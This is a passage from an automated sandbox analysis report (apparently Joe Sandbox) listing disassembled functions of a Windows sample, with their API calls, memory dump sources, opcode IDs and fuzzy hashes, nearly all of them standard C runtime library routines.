                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                    • String ID:
                                                                                    • API String ID: 2040435927-0
                                                                                    • Opcode ID: 0052296c27be0cde58e05742a25fdae0daab82eed3b5b1dcb4e36c420fc2eb79
                                                                                    • Instruction ID: b22c41627b41770629903986ffcfcea8eacfcf8425f4469e8fee42759e69637f
                                                                                    • Opcode Fuzzy Hash: 0052296c27be0cde58e05742a25fdae0daab82eed3b5b1dcb4e36c420fc2eb79
                                                                                    • Instruction Fuzzy Hash: 9551CE72612386ABDF214F62DC45FAF7BABEF60790F144128F90496290DB74CC11CB94
                                                                                    Function 006E51EC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 006E51F3
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E51FE
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E526C
                                                                                      • Part of subcall function 006E534F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 006E5367
                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 006E5219
                                                                                    • _Yarn.LIBCPMT ref: 006E522F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1088826258-2555016830
                                                                                    • Opcode ID: 277566266f9df4999a1e5ae36348a1c74d0686f216119a962a84739f3e5bee8c
                                                                                    • Instruction ID: c6f812c25670e6a83ca408db590b9e68ea8ab62a25e50201189034b9e6210e8c
                                                                                    • Opcode Fuzzy Hash: 277566266f9df4999a1e5ae36348a1c74d0686f216119a962a84739f3e5bee8c
                                                                                    • Instruction Fuzzy Hash: 3F01B175602694DBC705EB21E85557D37A3BF84354B14410CE91617381CF786E02CBC9
                                                                                    Function 006F0062 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A418D8C2,?,?,00000000,006FF147,000000FF,?,006EFFF2,00000002,?,006EFFC6,006ECA0D), ref: 006F0097
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F00A9
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,006FF147,000000FF,?,006EFFF2,00000002,?,006EFFC6,006ECA0D), ref: 006F00CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mEn$mscoree.dll
                                                                                    • API String ID: 4061214504-3563252196
                                                                                    • Opcode ID: 5c12326bac0e1c9fca8d368fa5102e72cbcebdfb3ac36984b4dbe651a47c1169
                                                                                    • Instruction ID: 96eb65ede1027c6262d56e2f20c8bcb8a3d042b28f08a95eb5a624e335191fb4
                                                                                    • Opcode Fuzzy Hash: 5c12326bac0e1c9fca8d368fa5102e72cbcebdfb3ac36984b4dbe651a47c1169
                                                                                    • Instruction Fuzzy Hash: 5A01447190465AEBDB118B50CC09FAEB7B9FB04714F008626E911A26D1DF789900CAA4
                                                                                    Function 006EA41A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,006EA411,006E89DA,006E7CE1), ref: 006EA428
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006EA436
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006EA44F
                                                                                    • SetLastError.KERNEL32(00000000,006EA411,006E89DA,006E7CE1), ref: 006EA4A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 0b995bed1e7c604e4b07b6f0c62cfc505373aa83fc2170b4e77f7e3c4c4db74d
                                                                                    • Instruction ID: 1094f8b8876cff765d59809d6662c5a05f4d15cb31f168dc970e3a5643b5b12c
                                                                                    • Opcode Fuzzy Hash: 0b995bed1e7c604e4b07b6f0c62cfc505373aa83fc2170b4e77f7e3c4c4db74d
                                                                                    • Instruction Fuzzy Hash: E001F53211B391EEE7511BB6BD4A7672797EB01334B20432EF410821E1FF961C00518F
                                                                                    Function 006EA531 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer
                                                                                    • String ID: mEn
                                                                                    • API String ID: 1740715915-2555016830
                                                                                    • Opcode ID: 4e88a03e511e66a18a0c096249844f50c0e01170d2e0e41c113b658afd8c1bb8
                                                                                    • Instruction ID: 5e0e3cb26876c867f4013018b2feefd0edc8cdd266a1c69b37f461100efd7d0c
                                                                                    • Opcode Fuzzy Hash: 4e88a03e511e66a18a0c096249844f50c0e01170d2e0e41c113b658afd8c1bb8
                                                                                    • Instruction Fuzzy Hash: 3251FFB2A02386AFDB258F92D841BBA77A6FF41310F18442DE8094B391D731FD41CB96
                                                                                    Function 006F6D31 Relevance: 7.7, APIs: 5, Instructions: 202COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 006F6DB8
                                                                                    • __alloca_probe_16.LIBCMT ref: 006F6E79
                                                                                    • __freea.LIBCMT ref: 006F6EE0
                                                                                      • Part of subcall function 006F5F8A: RtlAllocateHeap.NTDLL(00000000,006F89B1,?,?,006F89B1,00000220,?,00000000,?), ref: 006F5FBC
                                                                                    • __freea.LIBCMT ref: 006F6EF5
                                                                                    • __freea.LIBCMT ref: 006F6F05
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1423051803-0
                                                                                    • Opcode ID: b519267d04378f33176b950073862af0591f385c89bc1b9aac05f6f147d51564
                                                                                    • Instruction ID: 8bf4041246f811ba01f990f97e4a76586d74534e0792178070c63154d404ef38
                                                                                    • Opcode Fuzzy Hash: b519267d04378f33176b950073862af0591f385c89bc1b9aac05f6f147d51564
                                                                                    • Instruction Fuzzy Hash: D1519F7260521EAFEF259F65DC82EFB7AABEF44354B150129FE04D6251EB31CC1087A4
                                                                                    Function 006E262C Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E2638
                                                                                    • int.LIBCPMT ref: 006E264B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::_Lockit.LIBCPMT ref: 006E174B
                                                                                      • Part of subcall function 006E173A: std::_Lockit::~_Lockit.LIBCPMT ref: 006E1765
                                                                                    • std::_Facet_Register.LIBCPMT ref: 006E267E
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E2694
                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 006E269F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                    • String ID:
                                                                                    • API String ID: 2081738530-0
                                                                                    • Opcode ID: 1b2c8c01c701437ec70b969de1644c10be6807c0aa68adeb23c2355f9fb87ad1
                                                                                    • Instruction ID: e0cc02c432f19d38dbb29f45233e4af18b3782d1b07138478872ee0e29037ab0
                                                                                    • Opcode Fuzzy Hash: 1b2c8c01c701437ec70b969de1644c10be6807c0aa68adeb23c2355f9fb87ad1
                                                                                    • Instruction Fuzzy Hash: F501F232502394ABCB15AB66D85ACEE776FDF80764F24025CF8059B391EF309E42C788
                                                                                    Function 006EA220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 006EA25F
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 006EA313
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm$mEn
                                                                                    • API String ID: 3480331319-3856839041
                                                                                    • Opcode ID: 771a2c2b02ad27676bf28ecac25d195a5fa032767bd49143968dc89c51ccde29
                                                                                    • Instruction ID: 27d9d14ce7b79dd88829dbb4fdd7c1e8115c0b60ba65288d34225c39ad85214b
                                                                                    • Opcode Fuzzy Hash: 771a2c2b02ad27676bf28ecac25d195a5fa032767bd49143968dc89c51ccde29
                                                                                    • Instruction Fuzzy Hash: FE41B434A01349DFCF10DFAAC885ADE7BA2BF04314F148159E914AB392D736AA15CB96
                                                                                    Function 006EB562 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,006EB513,00000000,00000001,0073DEDC,?,?,?,006EB6B6,00000004,InitializeCriticalSectionEx,00701DA8,InitializeCriticalSectionEx), ref: 006EB56F
                                                                                    • GetLastError.KERNEL32(?,006EB513,00000000,00000001,0073DEDC,?,?,?,006EB6B6,00000004,InitializeCriticalSectionEx,00701DA8,InitializeCriticalSectionEx,00000000,?,006EB46D), ref: 006EB579
                                                                                    • LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,006EA383), ref: 006EB5A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID: api-ms-
                                                                                    • API String ID: 3177248105-2084034818
                                                                                    • Opcode ID: 76d1369ad7ff5a041947c6a62474984d7b0a60f70efc9e92c95bc80c3448bed2
                                                                                    • Instruction ID: c8581f4a425c8a4bf17d1209969ceda9c147903def834de252d52e226d4bcacb
                                                                                    • Opcode Fuzzy Hash: 76d1369ad7ff5a041947c6a62474984d7b0a60f70efc9e92c95bc80c3448bed2
                                                                                    • Instruction Fuzzy Hash: AFE0BF71685348FBEF101F62EC06B5A3E56AB00BA0F148121F90DB81E1DBA5D95099E9
                                                                                    Function 006F39A4 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetConsoleOutputCP.KERNEL32(A418D8C2,00000000,00000000,006ECCE4), ref: 006F3A07
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006F3C62
                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006F3CAA
                                                                                    • GetLastError.KERNEL32 ref: 006F3D4D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                    • String ID:
                                                                                    • API String ID: 2112829910-0
                                                                                    • Opcode ID: 46bde3a3e7c8ef4f94c86912750b637a35a9e8ac140fb6874295b7491f67f6a8
                                                                                    • Instruction ID: eba09797b4fdb4039aef7958e23a4bcfc80d295c86bc7d151c1f0c67eb5fa5ba
                                                                                    • Opcode Fuzzy Hash: 46bde3a3e7c8ef4f94c86912750b637a35a9e8ac140fb6874295b7491f67f6a8
                                                                                    • Instruction Fuzzy Hash: 9CD148B5D0425C9FCB15CFA8D880AEDBBB6FF09310F18416AE966E7351D730AA42CB54
                                                                                    Function 006F7EBE Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • GetLastError.KERNEL32 ref: 006F7F22
                                                                                    • __dosmaperr.LIBCMT ref: 006F7F29
                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 006F7F63
                                                                                    • __dosmaperr.LIBCMT ref: 006F7F6A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: cff5454a978504bccd68b7debf28d5ac97cdbf9b45222cb83983759bd250901b
                                                                                    • Instruction ID: 9df8abc8419163abee6c4b6c4eee66dec5129231985d956d7dfa124e88a03436
                                                                                    • Opcode Fuzzy Hash: cff5454a978504bccd68b7debf28d5ac97cdbf9b45222cb83983759bd250901b
                                                                                    • Instruction Fuzzy Hash: 8F21833160930DAFDB60AF66888197BB7ABFF44374710856DFA5997241E730EC118794
                                                                                    Function 006EF3A4 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d5f12b1b0442961a9da668b4f661a3341451ab8576f9335edc72ca0bf876099a
                                                                                    • Instruction ID: 52d0de0d6bbb4ea855a34ccc10f88232e2bdb64c79222c9cd438797cef6fa990
                                                                                    • Opcode Fuzzy Hash: d5f12b1b0442961a9da668b4f661a3341451ab8576f9335edc72ca0bf876099a
                                                                                    • Instruction Fuzzy Hash: DE21A171202395EFDB60AF63CC81A6B77EBAF40364B118539F825C7282D730EC1187A0
                                                                                    Function 006F8E54 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 006F8E5C
                                                                                      • Part of subcall function 006F7AA2: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,006F6ED6,?,00000000,-00000008), ref: 006F7B4E
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006F8E94
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006F8EB4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 8a58731b735e2f05018ed7b6358863b681168bf42da62ce1f07098a787e981c3
                                                                                    • Instruction ID: affd86df6dab172262ae93259e4394359f155774af2455286a81962b400456e3
                                                                                    • Opcode Fuzzy Hash: 8a58731b735e2f05018ed7b6358863b681168bf42da62ce1f07098a787e981c3
                                                                                    • Instruction Fuzzy Hash: 5A11C4B150561EFFA65127765C8DCBF2A9FDE853B57100158F701D6200FF64CD0146B9
                                                                                    Function 006FD255 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000), ref: 006FD26C
                                                                                    • GetLastError.KERNEL32(?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4,006ECCE4,?,006F4328,?), ref: 006FD278
                                                                                      • Part of subcall function 006FD23E: CloseHandle.KERNEL32(FFFFFFFE,006FD288,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4,006ECCE4), ref: 006FD24E
                                                                                    • ___initconout.LIBCMT ref: 006FD288
                                                                                      • Part of subcall function 006FD200: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006FD22F,006FC054,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4), ref: 006FD213
                                                                                    • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,006FC067,00000000,00000001,00000000,006ECCE4,?,006F3DA1,006ECCE4,00000000,00000000,006ECCE4), ref: 006FD29D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: d8d536817dc0b3bb79f60eef5a38dd3f3bfd61430cff49aed11be0ee1a606b9f
                                                                                    • Instruction ID: 7c40f5d4761d631593fbe42ec11ed0b94015fc64909e817f56b587d170677ab3
                                                                                    • Opcode Fuzzy Hash: d8d536817dc0b3bb79f60eef5a38dd3f3bfd61430cff49aed11be0ee1a606b9f
                                                                                    • Instruction Fuzzy Hash: 6EF0AC36500258FBCF222F95DD09B9B3F67FB0A3A1F148114FB1995161CA36D920DBD9
                                                                                    Function 006FE313 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,006FDC7F), ref: 006FE32C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DecodePointer
                                                                                    • String ID: ,6p$mEn
